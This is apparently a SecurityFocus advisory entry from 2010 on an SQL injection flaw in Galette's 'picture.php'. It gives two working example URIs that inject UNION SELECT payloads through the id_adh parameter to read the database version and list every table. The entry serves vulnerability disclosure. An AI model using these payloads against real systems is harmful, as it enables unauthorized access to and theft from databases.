Galette 'picture.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available.

http://www.example.com/picture.php?id_adh=0+and+1=0+union+select+@@version,null

http://www.example.com/picture.php?id_adh=0+and+1=0+union+select+group_concat(table_name,char(10)),null+from+information_schema.tables


 

Privacy Statement
Copyright 2010, SecurityFocus